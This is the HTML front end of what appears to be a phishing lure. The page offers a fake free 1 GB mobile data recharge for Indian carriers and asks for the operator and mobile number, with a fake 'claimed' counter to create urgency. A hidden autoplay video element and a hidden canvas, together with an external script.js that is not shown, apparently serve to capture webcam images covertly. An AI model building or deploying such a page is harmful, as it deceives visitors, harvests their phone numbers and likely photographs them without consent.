<!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Free 1 GB Data Booster</title>
    <style>
        body {
            background: linear-gradient(to right, #00c6ff, #0072ff);
            font-family: Arial, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }

        .container {
            background: #fff;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            text-align: center;
            width: 100%;
            max-width: 400px;
        }

        h1 {
            font-size: 24px;
            color: #333;
            margin-bottom: 20px;
        }

        .notice {
            background: #ffecb3;
            padding: 10px;
            border: 1px solid #ffeb3b;
            border-radius: 5px;
            margin-bottom: 20px;
            font-size: 14px;
        }

        .form-box {
            border: 1px solid #ddd;
            padding: 20px;
            border-radius: 10px;
            margin-bottom: 20px;
        }

        select, input[type="text"] {
            width: calc(100% - 20px);
            padding: 10px;
            margin-bottom: 10px;
            border: 1px solid #ccc;
            border-radius: 5px;
            box-sizing: border-box;
        }

        .submit-button {
            background: #00c853;
            color: #fff;
            border: none;
            padding: 10px;
            border-radius: 5px;
            width: 100%;
            cursor: pointer;
            transition: background 0.3s;
        }

        .submit-button:hover {
            background: #00b04f;
        }

        .user-count {
            font-size: 14px;
            color: #333;
        }

        video {
            display: none;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>🚀 Free 1 GB Network Data</h1>
        <div class="notice">�&nbsp; Free 1GB data pack recharge for everyone from us.</div>
        <div class="form-box">
            <form id="data-form">
                <select id="operator" required="">
                    <option value="">Select Operator</option>
                    <option value="Jio">Jio</option>
                    <option value="Airtel">Airtel</option>
                    <option value="VI">VI</option>
                    <option value="BSNL">BSNL</option>
                </select>
                <input type="text" id="mobile-number" placeholder="Mobile Number" required="" maxlength="10" pattern="\d{10}" title="Enter 10 digit mobile number">
                <button type="submit" class="submit-button">🎁 Claim</button>
            </form>
        </div>
        <div class="user-count">😃 Claimed 3589/5000 users.</div>
        <video id="video" autoplay=""></video>
        <canvas id="canvas" style="display:none;"></canvas>
    </div>
    <script src="script.js"></script>


</body></html>
